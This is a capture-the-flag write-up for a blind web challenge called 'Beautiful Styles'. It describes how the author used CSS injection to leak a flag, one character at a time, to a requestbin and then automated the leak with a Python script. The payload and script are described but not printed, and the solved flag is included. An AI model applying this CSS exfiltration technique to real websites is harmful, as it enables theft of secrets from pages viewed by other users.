Beautiful Styles
Last updated
Last updated
I opened a contest to see who could create the most beautiful CSS styles. Feel free to submit your CSS styles to me and I will add them to my website to judge them. I'll even give you a sample of my site to get you started. Flag only consists of numbers and uppercase letters. Comment Suggest edit
Author: Junhua
http://challs.nusgreyhats.org:33339
As there are no source code, its a blind web challenge.
The challenge get us to craft our own CSS for the application, before submitting it to admin for judging
This is a classical XS Leak challenge. I came accross two post explaining the vulnerability extremely well.
https://portswigger.net/research/blind-css-exfiltration
https://book.hacktricks.xyz/pentesting-web/xs-search/css-injection
Using the payload from hacktricks, I selected the input with id flag, and see if it can reach my requestbin instance.
We received two requests: one from us submitting and viewing the output, and one from the judge viewing the output. The flags from both endpoints are different.
After successfully developing a proof of concept, I coded a Python script to aid in retrieving the flag.
Running the script, I was able to iterate through each character of the char, and manually it appending to the flag variable if the request was sent.
We are also able to make logical guess on parts of the flag to speed up the process, such as S34
being S34RCH
and Y0
being YOU
so on and forth.
Whilst its not the most efficient, I was lazy and this works 🤷♂️
Flag: grey{X5S34RCH1fY0UC4NF1NDIT}
A more efficient approach is to start an HTTP server threaded and send the exploit in a separate thread. When the value of the flag is retrieved, it will then be appended to the flag variable. A sample payload, albeit for XSS, is listed below. It follows a similar concept.
https://github.com/rizemon/exploit-writing-for-oswe?tab=readme-ov-file#stealing-http-cookies